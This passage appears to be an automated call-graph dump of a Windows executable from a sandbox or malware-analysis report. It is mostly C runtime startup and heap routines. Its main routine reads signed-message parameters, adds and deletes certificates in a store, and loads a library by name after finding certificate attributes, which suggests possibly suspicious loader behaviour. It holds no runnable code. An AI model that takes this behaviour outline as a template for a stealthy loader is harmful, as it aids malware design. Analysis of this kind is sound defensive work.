6514->6279 6515->6259 5880 b63d86 5881 b61f7d ___scrt_uninitialize_crt 7 API calls 5880->5881 5882 b63d8d 5881->5882 6649 b69146 IsProcessorFeaturePresent 6108 b698c5 6110 b698ed 6108->6110 6109 b69925 6110->6109 6111 b69917 6110->6111 6112 b6991e 6110->6112 6113 b69997 16 API calls 6111->6113 6117 b69980 6112->6117 6115 b6991c 6113->6115 6118 b699a0 6117->6118 6119 b6a06f __startOneArgErrorHandling 16 API calls 6118->6119 6120 b69923 6119->6120 6650 b61442 6651 b61a6a GetModuleHandleW 6650->6651 6652 b6144a 6651->6652 6653 b61480 6652->6653 6654 b6144e 6652->6654 6656 b63793 _abort 23 API calls 6653->6656 6655 b61459 6654->6655 6659 b63775 6654->6659 6658 b61488 6656->6658 6660 b6355e _abort 23 API calls 6659->6660 6661 b63780 6660->6661 6661->6655 6121 b69ec3 6122 b69ecd 6121->6122 6123 b69ed9 6121->6123 6122->6123 6124 b69ed2 CloseHandle 6122->6124 6124->6123 6516 b63400 6517 b63412 6516->6517 6518 b63418 6516->6518 6519 b63376 15 API calls 6517->6519 6519->6518 6520 b61e00 6523 b61e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6520->6523 6521 b61e9e _ValidateLocalCookies 6523->6521 6525 b62340 RtlUnwind 6523->6525 6524 b61f27 _ValidateLocalCookies 6525->6524 6662 b63d41 6665 b6341b 6662->6665 6666 b6342a 6665->6666 6667 b63376 15 API calls 6666->6667 6668 b63444 6667->6668 6669 b63376 15 API calls 6668->6669 6670 b6344f 6669->6670 6125 b655ce GetCommandLineA GetCommandLineW 5883 b63d8f 5884 b63d9e 5883->5884 5889 b63db2 5883->5889 5887 b64869 _free 15 API calls 5884->5887 5884->5889 5885 b64869 _free 15 API calls 5886 b63dc4 5885->5886 5888 b64869 _free 15 API calls 5886->5888 5887->5889 5890 b63dd7 5888->5890 5889->5885 5891 b64869 _free 15 API calls 5890->5891 5892 b63de8 5891->5892 5893 b64869 _free 15 API calls 5892->5893 5894 b63df9 5893->5894 6526 b6430f 6527 b6432a 6526->6527 6528 b6431a 6526->6528 6532 b64330 6528->6532 6531 b64869 _free 15 API calls 6531->6527 6533 b64343 6532->6533 6534 b64349 6532->6534 6535 b64869 _free 15 API calls 6533->6535 6536 b64869 _free 15 API calls 6534->6536 6535->6534 6537 b64355 6536->6537 6538 b64869 _free 15 API calls 6537->6538 6539 b64360 6538->6539 6540 b64869 _free 15 API calls 6539->6540 6541 b6436b 6540->6541 6542 b64869 _free 15 API calls 6541->6542 6543 b64376 6542->6543 6544 b64869 _free 15 API calls 6543->6544 6545 b64381 6544->6545 6546 b64869 _free 15 API calls 6545->6546 6547 b6438c 6546->6547 6548 b64869 _free 15 API calls 6547->6548 6549 b64397 6548->6549 6550 b64869 _free 15 API calls 6549->6550 6551 b643a2 6550->6551 6552 b64869 _free 15 API calls 6551->6552 6553 b643b0 6552->6553 6558 b641f6 6553->6558 6564 b64102 6558->6564 6560 b6421a 6561 b64246 6560->6561 6577 b64163 6561->6577 6563 b6426a 6563->6531 6565 b6410e ___scrt_is_nonwritable_in_current_image 6564->6565 6572 b656e2 EnterCriticalSection 6565->6572 6567 b64142 6573 b64157 6567->6573 6569 b6414f _abort 6569->6560 6570 b64118 6570->6567 6571 b64869 _free 15 API calls 6570->6571 6571->6567 6572->6570 6576 b6572a LeaveCriticalSection 6573->6576 6575 b64161 6575->6569 6576->6575 6578 b6416f ___scrt_is_nonwritable_in_current_image 6577->6578 6585 b656e2 EnterCriticalSection 6578->6585 6580 b64179 6581 b643d9 _abort 15 API calls 6580->6581 6582 b6418c 6581->6582 6586 b641a2 6582->6586 6584 b6419a _abort 6584->6563 6585->6580 6589 b6572a LeaveCriticalSection 6586->6589 6588 b641ac 6588->6584 6589->6588 5032 b6130d 5033 b61319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 b6162b 5033->5060 5035 b61320 5036 b61473 5035->5036 5045 b6134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5045 5112 b6191f IsProcessorFeaturePresent 5036->5112 5038 b6147a 5039 b61480 5038->5039 5116 b637e1 5038->5116 5119 b63793 5039->5119 5043 b61369 5044 b613ea 5068 b61a34 5044->5068 5045->5043 5045->5044 5097 b637a9 5045->5097 5052 b61405 5103 b61a6a GetModuleHandleW 5052->5103 5055 b61410 5056 b61419 5055->5056 5105 b63784 5055->5105 5108 b6179c 5056->5108 5061 b61634 5060->5061 5122 b61bd4 IsProcessorFeaturePresent 5061->5122 5065 b61645 5066 b61649 5065->5066 5132 b61f7d 5065->5132 5066->5035 5192 b620b0 5068->5192 5071 b613f0 5072 b63457 5071->5072 5194 b6522b 5072->5194 5074 b63460 5076 b613f8 5074->5076 5198 b655b6 5074->5198 5077 b61000 6 API calls 5076->5077 5078 b61096 CryptMsgGetParam 5077->5078 5079 b611e3 Sleep 5077->5079 5080 b61162 CryptMsgGetParam 5078->5080 5081 b610bc LocalAlloc 5078->5081 5082 b61215 CertCloseStore LocalFree LocalFree LocalFree 5079->5082 5088 b611f7 5079->5088 5080->5079 5083 b61174 CryptMsgGetParam 5080->5083 5084 b61156 LocalFree 5081->5084 5085 b610d7 5081->5085 5082->5052 5083->5079 5086 b61188 CertFindAttribute CertFindAttribute 5083->5086 5084->5080 5087 b610e0 LocalAlloc CryptMsgGetParam 5085->5087 5090 b611b5 LoadLibraryA GetProcAddress 5086->5090 5091 b611b1 5086->5091 5092 b61114 CertCreateCertificateContext 5087->5092 5093 b6113d LocalFree 5087->5093 5088->5082 5089 b6120a CertDeleteCertificateFromStore 5088->5089 5089->5088 5090->5079 5091->5079 5091->5090 5094 b61126 CertAddCertificateContextToStore 5092->5094 5095 b61133 CertFreeCertificateContext 5092->5095 5093->5087 5096 b6114d 5093->5096 5094->5095 5095->5093 5096->5084 5098 b637d1 _abort 5097->5098 5098->5044 5099 b64424 _abort 33 API calls 5098->5099 5102 b63e9a 5099->5102 5100 b63f24 _abort 33 API calls 5101 b63ec4 5100->5101 5102->5100 5104 b6140c 5103->5104 5104->5038 5104->5055 5686 b6355e 5105->5686 5107 b6378f 5107->5056 5109 b617a8 ___scrt_uninitialize_crt 5108->5109 5110 b61421 5109->5110 5111 b61f7d ___scrt_uninitialize_crt 7 API calls 5109->5111 5110->5043 5111->5110 5113 b61935 _abort 5112->5113 5114 b619e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 b61a24 _abort 5114->5115 5115->5038 5117 b6355e _abort 23 API calls 5116->5117 5118 b637f2 5117->5118 5118->5039 5120 b6355e _abort 23 API calls 5119->5120 5121 b61488 5120->5121 5123 b61640 5122->5123 5124 b61f5e 5123->5124 5138 b624b1 5124->5138 5128 b61f6f 5129 b61f7a 5128->5129 5152 b624ed 5128->5152 5129->5065 5131 b61f67 5131->5065 5133 b61f86 5132->5133 5134 b61f90 5132->5134 5135 b62496 ___vcrt_uninitialize_ptd 6 API calls 5133->5135 5134->5066 5136 b61f8b 5135->5136 5137 b624ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5134 5139 b624ba 5138->5139 5141 b624e3 5139->5141 5143 b61f63 5139->5143 5156 b6271d 5139->5156 5142 b624ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5142 5142->5143 5143->5131 5144 b62463 5143->5144 5173 b6262e 5144->5173 5149 b62493 5149->5128 5151 b62478 5151->5128 5153 b62517 5152->5153 5154 b624f8 5152->5154 5153->5131 5155 b62502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 b62543 5156->5161 5159 b62755 InitializeCriticalSectionAndSpinCount 5160 b62740 5159->5160 5160->5139 5162 b62560 5161->5162 5165 b62564 5161->5165 5162->5159 5162->5160 5163 b625cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 b625bd 5165->5166 5168 b625e3 LoadLibraryExW 5165->5168 5166->5163 5167 b625c5 FreeLibrary 5166->5167 5167->5163 5169 b6262a 5168->5169 5170 b625fa GetLastError 5168->5170 5169->5165 5170->5169 5171 b62605 ___vcrt_FlsFree 5170->5171 5171->5169 5172 b6261b LoadLibraryExW 5171->5172 5172->5165 5174 b62543 ___vcrt_FlsFree 5 API calls 5173->5174 5175 b62648 5174->5175 5176 b62661 TlsAlloc 5175->5176 5177 b6246d 5175->5177 5177->5151 5178 b626df 5177->5178 5179 b62543 ___vcrt_FlsFree 5 API calls 5178->5179 5180 b626f9 5179->5180 5181 b62714 TlsSetValue 5180->5181 5182 b62486 5180->5182 5181->5182 5182->5149 5183 b62496 5182->5183 5184 b624a0 5183->5184 5186 b624a6 5183->5186 5187 b62669 5184->5187 5186->5151 5188 b62543 ___vcrt_FlsFree 5 API calls 5187->5188 5189 b62683 5188->5189 5190 b6269b TlsFree 5189->5190 5191 b6268f 5189->5191 5190->5191 5191->5186 5193 b61a47 GetStartupInfoW 5192->5193 5193->5071 5195 b6523d 5194->5195 5196 b65234 5194->5196 5195->5074 5201 b6512a 5196->5201 5683 b6555d 5198->5683 5221 b64424 GetLastError 5201->5221 5203 b65137 5241 b65249 5203->5241 5205 b6513f 5250 b64ebe 5205->5250 5208 b65156 5208->5195 5212 b6518c 5214 b65194 5212->5214 5215 b651b1 5212->5215 5272 b647f9 5214->5272 5217 b651dd 5215->5217 5218 b64869 _free 15 API calls 5215->5218 5220 b65199 5217->5220 5281 b64d94 5217->5281 5218->5217 5275 b64869 5220->5275 5222 b64440 5221->5222 5223 b6443a 5221->5223 5226 b6448f SetLastError 5222->5226 5289 b6480c 5222->5289 5284 b65904 5223->5284 5226->5203 5228 b6445a 5230 b64869 _free 15 API calls 5228->5230 5232 b64460 5230->5232 5231 b6446f 5231->5228 5233 b64476 5231->5233 5234 b6449b SetLastError 5232->5234 5301 b64296 5233->5301 5306 b63f24 5234->5306 5238 b64869 _free 15 API calls 5240 b64488 5238->5240 5240->5226 5240->5234 5242 b65255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 b64424 _abort 33 API calls 5242->5243 5248 b6525f 5243->5248 5245 b652e3 _abort 5245->5205 5246 b63f24 _abort 33 API calls 5246->5248 5248->5245 5248->5246 5249 b64869 _free 15 API calls 5248->5249 5542 b656e2 EnterCriticalSection 5248->5542 5543 b652da 5248->5543 5249->5248 5547 b63f72 5250->5547 5253 b64ef1 5255 b64f08 5253->5255 5256 b64ef6 GetACP 5253->5256 5254 b64edf GetOEMCP 5254->5255 5255->5208 5257 b662ff 5255->5257 5256->5255 5258 b6633d 5257->5258 5262 b6630d _abort 5257->5262 5260 b647f9 _free 15 API calls 5258->5260 5259 b66328 HeapAlloc 5261 b65167 5259->5261 5259->5262 5260->5261 5261->5220 5264 b652eb 5261->5264 5262->5258 5262->5259 5263 b66992 _abort 2 API calls 5262->5263 5263->5262 5265 b64ebe 35 API calls 5264->5265 5266 b6530a 5265->5266 5267 b6535b IsValidCodePage 5266->5267 5269 b65311 _ValidateLocalCookies 5266->5269 5271 b65380 _abort 5266->5271 5268 b6536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5212 5584 b64f96 GetCPInfo 5271->5584 5273 b644a8 _abort 15 API calls 5272->5273 5274 b647fe 5273->5274 5274->5220 5276 b64874 HeapFree 5275->5276 5280 b6489d _free 5275->5280 5277 b64889 5276->5277 5276->5280 5278 b647f9 _free 13 API calls 5277->5278 5279 b6488f GetLastError 5278->5279 5279->5280 5280->5208 5647 b64d51 5281->5647 5283 b64db8 5283->5220 5317 b65741 5284->5317 5286 b6592b 5287 b65943 TlsGetValue 5286->5287 5288 b65937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5295 b64819 _abort 5289->5295 5290 b64859 5292 b647f9 _free 14 API calls 5290->5292 5291 b64844 HeapAlloc 5293 b64452 5291->5293 5291->5295 5292->5293 5293->5228 5296 b6595a 5293->5296 5295->5290 5295->5291 5330 b66992 5295->5330 5297 b65741 _abort 5 API calls 5296->5297 5298 b65981 5297->5298 5299 b6599c TlsSetValue 5298->5299 5300 b65990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 b6426e 5301->5344 5452 b66b14 5306->5452 5309 b63f35 5311 b63f3e IsProcessorFeaturePresent 5309->5311 5312 b63f5c 5309->5312 5313 b63f49 5311->5313 5314 b63793 _abort 23 API calls 5312->5314 5480 b64573 5313->5480 5316 b63f66 5314->5316 5318 b65771 _abort 5317->5318 5320 b6576d 5317->5320 5318->5286 5320->5318 5322 b65791 5320->5322 5323 b657dd 5320->5323 5321 b6579d GetProcAddress 5321->5318 5322->5318 5322->5321 5324 b657fe LoadLibraryExW 5323->5324 5325 b657f3 5323->5325 5326 b65833 5324->5326 5327 b6581b GetLastError 5324->5327 5325->5320 5326->5325 5328 b6584a FreeLibrary 5326->5328 5327->5326 5329 b65826 LoadLibraryExW 5327->5329 5328->5325 5329->5326 5333 b669d6 5330->5333 5332 b669a8 _ValidateLocalCookies 5332->5295 5334 b669e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 b656e2 EnterCriticalSection 5334->5339 5336 b669ed 5340 b66a1f 5336->5340 5338 b66a14 _abort 5338->5332 5339->5336 5343 b6572a LeaveCriticalSection 5340->5343 5342 b66a26 5342->5338 5343->5342 5350 b641ae 5344->5350 5346 b64292 5347 b6421e 5346->5347 5361 b640b2 5347->5361 5349 b64242 5349->5238 5351 b641ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 b656e2 EnterCriticalSection 5351->5356 5353 b641c4 5357 b641ea 5353->5357 5355 b641e2 _abort 5355->5346 5356->5353 5360 b6572a LeaveCriticalSection 5357->5360 5359 b641f4 5359->5355 5360->5359 5362 b640be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 b656e2 EnterCriticalSection 5362->5369 5364 b640c8 5370 b643d9 5364->5370 5366 b640e0 5374 b640f6 5366->5374 5368 b640ee _abort 5368->5349 5369->5364 5371 b6440f __fassign 5370->5371 5372 b643e8 __fassign 5370->5372 5371->5366 5372->5371 5377 b66507 5372->5377 5451 b6572a LeaveCriticalSection 5374->5451 5376 b64100 5376->5368 5378 b66587 5377->5378 5381 b6651d 5377->5381 5379 b665d5 5378->5379 5382 b64869 _free 15 API calls 5378->5382 5445 b6667a 5379->5445 5381->5378 5383 b66550 5381->5383 5388 b64869 _free 15 API calls 5381->5388 5384 b665a9 5382->5384 5385 b66572 5383->5385 5394 b64869 _free 15 API calls 5383->5394 5386 b64869 _free 15 API calls 5384->5386 5387 b64869 _free 15 API calls 5385->5387 5389 b665bc 5386->5389 5391 b6657c 5387->5391 5393 b66545 5388->5393 5395 b64869 _free 15 API calls 5389->5395 5390 b665e3 5392 b66643 5390->5392 5404 b64869 15 API calls _free 5390->5404 5396 b64869 _free 15 API calls 5391->5396 5397 b64869 _free 15 API calls 5392->5397 5405 b66078 5393->5405 5399 b66567 5394->5399 5400 b665ca 5395->5400 5396->5378 5401 b66649 5397->5401 5433 b66176 5399->5433 5403 b64869 _free 15 API calls 5400->5403 5401->5371 5403->5379 5404->5390 5406 b66089 5405->5406 5432 b66172 5405->5432 5407 b6609a 5406->5407 5408 b64869 _free 15 API calls 5406->5408 5409 b660ac 5407->5409 5410 b64869 _free 15 API calls 5407->5410 5408->5407 5411 b660be 5409->5411 5412 b64869 _free 15 API calls 5409->5412 5410->5409 5413 b660d0 5411->5413 5414 b64869 _free 15 API calls 5411->5414 5412->5411 5415 b64869 _free 15 API calls 5413->5415 5418 b660e2 5413->5418 5414->5413 5415->5418 5416 b64869 _free 15 API calls 5417 b660f4 5416->5417 5419 b64869 _free 15 API calls 5417->5419 5420 b66106 5417->5420 5418->5416 5418->5417 5419->5420 5421 b66118 5420->5421 5422 b64869 _free 15 API calls 5420->5422 5423 b6612a 5421->5423 5424 b64869 _free 15 API calls 5421->5424 5422->5421 5425 b6613c 5423->5425 5426 b64869 _free 15 API calls 5423->5426 5424->5423 5427 b6614e 5425->5427 5428 b64869 _free 15 API calls 5425->5428 5426->5425 5429 b66160 5427->5429 5430 b64869 _free 15 API calls 5427->5430 5428->5427 5431 b64869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5383 5434 b66183 5433->5434 5435 b661db 5433->5435 5436 b66193 5434->5436 5437 b64869 _free 15 API calls 5434->5437 5435->5385 5438 b661a5 5436->5438 5439 b64869 _free 15 API calls 5436->5439 5437->5436 5440 b661b7 5438->5440 5441 b64869 _free 15 API calls 5438->5441 5439->5438 5442 b661c9 5440->5442 5443 b64869 _free 15 API calls 5440->5443 5441->5440 5442->5435 5444 b64869 _free 15 API calls 5442->5444 5443->5442 5444->5435 5446 b66687 5445->5446 5450 b666a5 5445->5450 5447 b6621b __fassign 15 API calls 5446->5447 5446->5450 5448 b6669f 5447->5448 5449 b64869 _free 15 API calls 5448->5449 5449->5450 5450->5390 5451->5376 5484 b66a82 5452->5484 5455 b66b6f 5456 b66b7b _abort 5455->5456 5457 b66ba2 _abort 5456->5457 5459 b66ba8 _abort 5456->5459 5498 b644a8 GetLastError 5456->5498 5457->5459 5460 b66bf4 5457->5460 5464 b66bd7 _abort 5457->5464 5466 b66c20 5459->5466 5520 b656e2 EnterCriticalSection 5459->5520 5461 b647f9 _free 15 API calls 5460->5461 5462 b66bf9 5461->5462 5517 b6473d 5462->5517 5464->5309 5467 b66c7f 5466->5467 5469 b66c77 5466->5469 5477 b66caa 5466->5477 5521 b6572a LeaveCriticalSection 5466->5521 5467->5477 5522 b66b66 5467->5522 5472 b63793 _abort 23 API calls 5469->5472 5472->5467 5475 b64424 _abort 33 API calls 5478 b66d0d 5475->5478 5476 b66b66 _abort 33 API calls 5476->5477 5525 b66d2f 5477->5525 5478->5464 5479 b64424 _abort 33 API calls 5478->5479 5479->5464 5481 b6458f _abort 5480->5481 5482 b645bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 b6468c _abort _ValidateLocalCookies 5482->5483 5483->5312 5487 b66a28 5484->5487 5486 b63f29 5486->5309 5486->5455 5488 b66a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 b656e2 EnterCriticalSection 5488->5493 5490 b66a42 5494 b66a76 5490->5494 5492 b66a69 _abort 5492->5486 5493->5490 5497 b6572a LeaveCriticalSection 5494->5497 5496 b66a80 5496->5492 5497->5496 5499 b644c1 5498->5499 5500 b644c7 5498->5500 5501 b65904 _abort 6 API calls 5499->5501 5502 b6480c _abort 12 API calls 5500->5502 5505 b6451e SetLastError 5500->5505 5501->5500 5503 b644d9 5502->5503 5504 b644e1 5503->5504 5507 b6595a _abort 6 API calls 5503->5507 5508 b64869 _free 12 API calls 5504->5508 5506 b64527 5505->5506 5506->5457 5509 b644f6 5507->5509 5510 b644e7 5508->5510 5509->5504 5511 b644fd 5509->5511 5512 b64515 SetLastError 5510->5512 5513 b64296 _abort 12 API calls 5511->5513 5512->5506 5514 b64508 5513->5514 5515 b64869 _free 12 API calls 5514->5515 5516 b6450e 5515->5516 5516->5505 5516->5512 5529 b646c2 5517->5529 5519 b64749 5519->5464 5520->5466 5521->5469 5523 b64424 _abort 33 API calls 5522->5523 5524 b66b6b 5523->5524 5524->5476 5526 b66d35 5525->5526 5527 b66cfe 5525->5527 5541 b6572a LeaveCriticalSection 5526->5541 5527->5464 5527->5475 5527->5478 5530 b644a8 _abort 15 API calls 5529->5530 5531 b646d8 5530->5531 5535 b646e6 _ValidateLocalCookies 5531->5535 5537 b6474d IsProcessorFeaturePresent 5531->5537 5533 b6473c 5534 b646c2 _abort 21 API calls 5533->5534 5536 b64749 5534->5536 5535->5519 5536->5519 5538 b64758 5537->5538 5539 b64573 _abort 3 API calls 5538->5539 5540 b6476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5527 5542->5248 5546 b6572a LeaveCriticalSection 5543->5546 5545 b652e1 5545->5248 5546->5545 5548 b63f85 5547->5548 5549 b63f8f 5547->5549 5548->5253 5548->5254 5549->5548 5550 b64424 _abort 33 API calls 5549->5550 5551 b63fb0 5550->5551 5555 b672d1 5551->5555 5556 b672e4 5555->5556 5557 b63fc9 5555->5557 5556->5557 5563 b66754 5556->5563 5559 b672fe 5557->5559 5560 b67311 5559->5560 5561 b67326 5559->5561 5560->5561 5562 b65249 __fassign 33 API calls 5560->5562 5561->5548 5562->5561 5564 b66760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 b64424 _abort 33 API calls 5564->5565 5566 b66769 5565->5566 5567 b667b7 _abort 5566->5567 5575 b656e2 EnterCriticalSection 5566->5575 5567->5557 5569 b66787 5576 b667cb 5569->5576 5574 b63f24 _abort 33 API calls 5574->5567 5575->5569 5577 b6679b 5576->5577 5578 b667d9 __fassign 5576->5578 5580 b667ba 5577->5580 5578->5577 5579 b66507 __fassign 15 API calls 5578->5579 5579->5577 5583 b6572a LeaveCriticalSection 5580->5583 5582 b667ae 5582->5567 5582->5574 5583->5582 5588 b64fd0 5584->5588 5591 b6507a _ValidateLocalCookies 5584->5591 5586 b65031 5604 b67cd1 5586->5604 5592 b6634d 5588->5592 5590 b67cd1 38 API calls 5590->5591 5591->5269 5593 b63f72 __fassign 33 API calls 5592->5593 5594 b6636d MultiByteToWideChar 5593->5594 5596 b663ab 5594->5596 5597 b66443 _ValidateLocalCookies 5594->5597 5598 b662ff 16 API calls 5596->5598 5600 b663cc _abort __alloca_probe_16 5596->5600 5597->5586 5598->5600 5599 b6643d 5609 b6646a 5599->5609 5600->5599 5602 b66411 MultiByteToWideChar 5600->5602 5602->5599 5603 b6642d GetStringTypeW 5602->5603 5603->5599 5605 b63f72 __fassign 33 API calls 5604->5605 5606 b67ce4 5605->5606 5613 b67ab4 5606->5613 5608 b65052 5608->5590 5610 b66476 5609->5610 5611 b66487 5609->5611 5610->5611 5612 b64869 _free 15 API calls 5610->5612 5611->5597 5612->5611 5614 b67acf 5613->5614 5615 b67af5 MultiByteToWideChar 5614->5615 5616 b67b1f 5615->5616 5617 b67ca9 _ValidateLocalCookies 5615->5617 5618 b662ff 16 API calls 5616->5618 5621 b67b40 __alloca_probe_16 5616->5621 5617->5608 5618->5621 5619 b67bf5 5624 b6646a __freea 15 API calls 5619->5624 5620 b67b89 MultiByteToWideChar 5620->5619 5622 b67ba2 5620->5622 5621->5619 5621->5620 5638 b65a15 5622->5638 5624->5617 5625 b67bb9 5625->5619 5626 b67c04 5625->5626 5627 b67bcc 5625->5627 5630 b662ff 16 API calls 5626->5630 5633 b67c25 __alloca_probe_16 5626->5633 5627->5619 5629 b65a15 6 API calls 5627->5629 5628 b67c9a 5632 b6646a __freea 15 API calls 5628->5632 5629->5619 5630->5633 5631 b65a15 6 API calls 5634 b67c79 5631->5634 5632->5619 5633->5628 5633->5631 5634->5628 5635 b67c88 WideCharToMultiByte 5634->5635 5635->5628 5636 b67cc8 5635->5636 5637 b6646a __freea 15 API calls 5636->5637 5637->5619 5639 b65741 _abort 5 API calls 5638->5639 5640 b65a3c 5639->5640 5643 b65a45 _ValidateLocalCookies 5640->5643 5644 b65a9d 5640->5644 5642 b65a85 LCMapStringW 5642->5643 5643->5625 5645 b65741 _abort 5 API calls 5644->5645 5646 b65ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 b64d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 b656e2 EnterCriticalSection 5648->5655 5650 b64d67 5656 b64dbc 5650->5656 5654 b64d80 _abort 5654->5283 5655->5650 5668 b654dc 5656->5668 5658 b64e0a 5659 b654dc 21 API calls 5658->5659 5660 b64e26 5659->5660 5661 b654dc 21 API calls 5660->5661 5662 b64e44 5661->5662 5663 b64d74 5662->5663 5664 b64869 _free 15 API calls 5662->5664 5665 b64d88 5663->5665 5664->5663 5682 b6572a LeaveCriticalSection 5665->5682 5667 b64d92 5667->5654 5669 b654ed 5668->5669 5673 b654e9 5668->5673 5670 b654f4 5669->5670 5675 b65507 _abort 5669->5675 5671 b647f9 _free 15 API calls 5670->5671 5672 b654f9 5671->5672 5674 b6473d _abort 21 API calls 5672->5674 5673->5658 5674->5673 5675->5673 5676 b65535 5675->5676 5678 b6553e 5675->5678 5677 b647f9 _free 15 API calls 5676->5677 5679 b6553a 5677->5679 5678->5673 5680 b647f9 _free 15 API calls 5678->5680 5681 b6473d _abort 21 API calls 5679->5681 5680->5679 5681->5673 5682->5667 5684 b63f72 __fassign 33 API calls 5683->5684 5685 b65571 5684->5685 5685->5074 5687 b6356a _abort 5686->5687 5688 b63582 5687->5688 5701 b636b8 GetModuleHandleW 5687->5701 5708 b656e2 EnterCriticalSection 5688->5708 5695 b635ff _abort 5712 b63668 5695->5712 5696 b6358a 5696->5695 5709 b63c97 5696->5709 5697 b63671 _abort 5697->5107 5702 b63576 5701->5702 5702->5688 5703 b636fc GetModuleHandleExW 5702->5703 5704 b63726 GetProcAddress 5703->5704 5705 b6373b 5703->5705 5704->5705 5706 b6374f FreeLibrary 5705->5706 5707 b63758 _ValidateLocalCookies 5705->5707 5706->5707 5707->5688 5708->5696 5723 b639d0 5709->5723 5743 b6572a LeaveCriticalSection 5712->5743 5714 b63641 5714->5697 5715 b63677 5714->5715 5744 b65b1f 5715->5744 5717 b63681 5718 b636a5 5717->5718 5719 b63685 GetPEB 5717->5719 5721 b636fc _abort 3 API calls 5718->5721 5719->5718 5720 b63695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 b636ad ExitProcess 5721->5722 5726 b6397f 5723->5726 5725 b639f4 5725->5695 5727 b6398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 b656e2 EnterCriticalSection 5727->5734 5729 b63999 5735 b63a20 5729->5735 5731 b639a6 5739 b639c4 5731->5739 5733 b639b7 _abort 5733->5725 5734->5729 5736 b63a40 _ValidateLocalCookies 5735->5736 5737 b63a48 5735->5737 5736->5731 5737->5736 5738 b64869 _free 15 API calls 5737->5738 5738->5736 5742 b6572a LeaveCriticalSection 5739->5742 5741 b639ce 5741->5733 5742->5741 5743->5714 5745 b65b44 5744->5745 5747 b65b3a _ValidateLocalCookies 5744->5747 5746 b65741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6671 b6324d 6672 b6522b 46 API calls 6671->6672 6673 b6325f 6672->6673 6682 b6561e GetEnvironmentStringsW 6673->6682 6676 b6326a 6678 b64869 _free 15 API calls 6676->6678 6679 b6329f 6678->6679 6680 b63275 6681 b64869 _free 15 API calls 6680->6681 6681->6676 6683 b65635 6682->6683 6693 b65688 6682->6693 6686 b6563b WideCharToMultiByte 6683->6686 6684 b65691 FreeEnvironmentStringsW 6685 b63264 6684->6685 6685->6676 6694 b632a5 6685->6694 6687 b65657 6686->6687 6686->6693 6688 b662ff 16 API calls 6687->6688 6689 b6565d 6688->6689 6690 b65664 WideCharToMultiByte 6689->6690 6691 b6567a 6689->6691 6690->6691 6692 b64869 _free 15 API calls 6691->6692 6692->6693 6693->6684 6693->6685 6695 b632ba 6694->6695 6696 b6480c _abort 15 API calls 6695->6696 6697 b632e1 6696->6697 6698 b63345 6697->6698 6701 b6480c _abort 15 API calls 6697->6701 6702 b63347 6697->6702 6706 b63369 6697->6706 6709 b64869 _free 15 API calls 6697->6709 6711 b63eca 6697->6711 6699 b64869 _free 15 API calls 6698->6699 6700 b6335f 6699->6700 6700->6680 6701->6697 6703 b63376 15 API calls 6702->6703 6705 b6334d 6703->6705 6707 b64869 _free 15 API calls 6705->6707 6708 b6474d _abort 6 API calls 6706->6708 6707->6698 6710 b63375 6708->6710 6709->6697 6712 b63ed7 6711->6712 6713 b63ee5 6711->6713 6712->6713 6718 b63efc 6712->6718 6714 b647f9 _free 15 API calls 6713->6714 6715 b63eed 6714->6715 6716 b6473d _abort 21 API calls 6715->6716 6717 b63ef7 6716->6717 6717->6697 6718->6717 6719 b647f9 _free 15 API calls 6718->6719 6719->6715 5895 b64c8a 5900 b64cbf 5895->5900 5898 b64ca6 5899 b64869 _free 15 API calls 5899->5898 5901 b64cd1 5900->5901 5910 b64c98 5900->5910 5902 b64cd6 5901->5902 5903 b64d01 5901->5903 5904 b6480c _abort 15 API calls 5902->5904 5903->5910 5911 b6681b 5903->5911 5905 b64cdf 5904->5905 5907 b64869 _free 15 API calls 5905->5907 5907->5910 5908 b64d1c 5909 b64869 _free 15 API calls 5908->5909 5909->5910 5910->5898 5910->5899 5912 b66826 5911->5912 5913 b6684e 5912->5913 5914 b6683f 5912->5914 5915 b6685d 5913->5915 5920 b67e13 5913->5920 5916 b647f9 _free 15 API calls 5914->5916 5927 b67e46 5915->5927 5919 b66844 _abort 5916->5919 5919->5908 5921 b67e33 HeapSize 5920->5921 5922 b67e1e 5920->5922 5921->5915 5923 b647f9 _free 15 API calls 5922->5923 5924 b67e23 5923->5924 5925 b6473d _abort 21 API calls 5924->5925 5926 b67e2e 5925->5926 5926->5915 5928 b67e53 5927->5928 5929 b67e5e 5927->5929 5930 b662ff 16 API calls 5928->5930 5931 b67e66 5929->5931 5937 b67e6f _abort 5929->5937 5935 b67e5b 5930->5935 5932 b64869 _free 15 API calls 5931->5932 5932->5935 5933 b67e74 5936 b647f9 _free 15 API calls 5933->5936 5934 b67e99 HeapReAlloc 5934->5935 5934->5937 5935->5919 5936->5935 5937->5933 5937->5934 5938 b66992 _abort 2 API calls 5937->5938 5938->5937 6720 b61248 6721 b61250 6720->6721 6737 b637f7 6721->6737 6723 b6125b 6744 b61664 6723->6744 6725 b6191f 4 API calls 6726 b612f2 6725->6726 6727 b61270 __RTC_Initialize 6735 b612cd 6727->6735 6750 b617f1 6727->6750 6729 b61289 6729->6735 6753 b618ab InitializeSListHead 6729->6753 6731 b6129f 6754 b618ba 6731->6754 6733 b612c2 6760 b63891 6733->6760 6735->6725 6736 b612ea 6735->6736 6738 b63829 